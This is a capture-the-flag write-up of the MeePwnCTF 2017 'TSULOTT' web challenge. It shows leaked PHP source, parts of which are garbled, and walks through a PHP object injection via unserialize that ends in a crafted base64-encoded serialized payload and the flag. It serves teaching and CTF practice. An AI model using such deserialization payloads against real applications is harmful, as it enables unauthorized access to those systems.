# TSULOTT

**100 pts**

> Who Wants to Be a Millionaire? Join My LOTT and Win JACKPOTTTT!!!

Remote: [128.199.190.23:8001](http://128.199.190.23:8001)

---

# Writeups

## Think simple
- Lets check the source code from the web.
- Here we can see a comment,
```HTML

```
mmmm... why not [128.199.190.23:8001?is_debug=1](http://128.199.190.23:8001?is_debug=1).
- Awesome! now we can read the server code, it is written in PHP.

```php
<body>
<style>
input[type=text] {
width: 40%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border: 2px solid red;
background-color: #ebfff8;
border-radius: 4px;
}

button[type=submit] {
width: 10%;
background-color: #F94848;
color: white;
padding: 14px 20px;
margin: 8px 0;
border: none;
border-radius: 4px;
cursor: pointer;
}

button[type=submit]:hover {
background-color: #45a049;
}

body {
background-image: url("money.jpg");
}
</style>

jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
if($obj->enter === $obj->jackpot)
{
echo "<center><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></center>". "
<center><font color='white' size='20'>".$obj->jackpot."</font></center>";
echo "
<center><font color='green' size='25'>".$flag."</font></center>
";
echo "<center></center>";

}
else
{
echo "

<center><font color='white'>Wrong! True Six Numbers Are: </font></center>". "
<center><font color='white' size='25'>".$obj->jackpot."</font></center>
";
}
}
else
{
echo "<center><font color='white'>- Something wrong, do not hack us please! -</font></center>";
}
}
else
{
echo "";
}
?>
<center>

<h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2>

<font color='white'>Input your code to win jackpot!</font>

<form>
<input type="text" name="input" />

<button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
enter=$_GET['gen_code'];
$code=base64_encode(serialize($temp));
echo '<center><font color=\'white\'>Here is your code, please use it to Lott: '.$code.'</font></center>';
}
?>
<center>
<font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font>
<h3><font color='white'>Take code</font></h3>

<font color='white'>Pick your six numbers (Ex: 15 02 94 11 88 76)</font>

<form>
<input type="text" name="gen_code" maxlength="17" />

<button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>


</body>
```

## Injection
The flag is rendered after this condition:
```php
if($obj->enter === $obj->jackpot)
```
Reading the PHP code we can notice the vulnerability. PHP Object Injection.
Get the input and try to unserialize it as an Object.
```php
$obj = unserialize(base64_decode($_GET['input']));
```
We need the enter value and the jackpot value of the object to be the same, but we will never manage to get it right. The object is serialized and then the jackpot attribute is setted as random.
```php
$obj = unserialize(base64_decode($_GET['input']));
if($obj) {
$obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
if($obj->enter === $obj->jackpot);
...
}
```

Our only chance is generate a completely random object and encoded with base64.
- [https://www.tools4noobs.com/online_php_functions/base64_encode/](https://www.tools4noobs.com/online_php_functions/base64_encode/)
- Generate a random object, in this case an object Test who have 2 attributes (jackpot and enter) both of them NULL
```json
INPUT: O:4:"Test":2:{s:7:"jackpot";N;s:5:"enter";N;}
```
```json
OUTPUT: "Tzo0OiJUZXN0IjoyOntzOjc6ImphY2twb3QiO047czo1OiJlbnRlciI7Tjt9"
```

## Win the lottery
Paste the output into the form and voilà:
### MeePwnCTF{__OMG!!!__Y0u_Are_Milli0naire_N0ww!!___}


Original writeup (https://github.com/bl4ckpr15m/CTF-Writeups/blob/master/2017/MeePwn/web/TSULOTT/writeup%20%5Bby%20Jorge%20Chato%5D.md).